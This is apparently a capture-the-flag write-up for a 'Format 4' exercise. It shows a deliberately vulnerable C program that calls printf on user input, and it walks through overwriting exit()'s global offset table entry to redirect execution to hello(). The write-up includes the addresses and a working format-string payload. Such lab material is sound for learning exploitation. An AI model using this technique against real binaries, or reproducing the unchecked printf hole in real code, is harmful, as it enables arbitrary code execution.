# Format 4

## Source code

```
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int target;

void hello()
{
  printf("code execution redirected! you win\n");
  _exit(1);
}

void vuln()
{
  char buffer[512];

  fgets(buffer, sizeof(buffer), stdin);

  printf(buffer);

  exit(1);  
}

int main(int argc, char **argv)
{
  vuln();
}
```

## Challenge

In this challenge we need to execute `hello()` function we can do this by modifying our `GLOBAL_OFFSET_TABLE` we can do that by using arbitary memory write using format string vulnerabilty so first we need to find the address of `exit()` in global offset table

![](images/format4_0.png)

hence the address where we need to write the address of win`(0x080484b4)` is `0x08049724` and so creating our payload

```
print '\x24\x97\x04\x08JUNK\x25\x97\x04\x08JUNK\x26\x97\x04\x08JUNK\x27\x97\x04\x08'+'%x%x%141x%n%208x%n%128x%n%260x%n'
```

![](images/format4_1.png)

And done!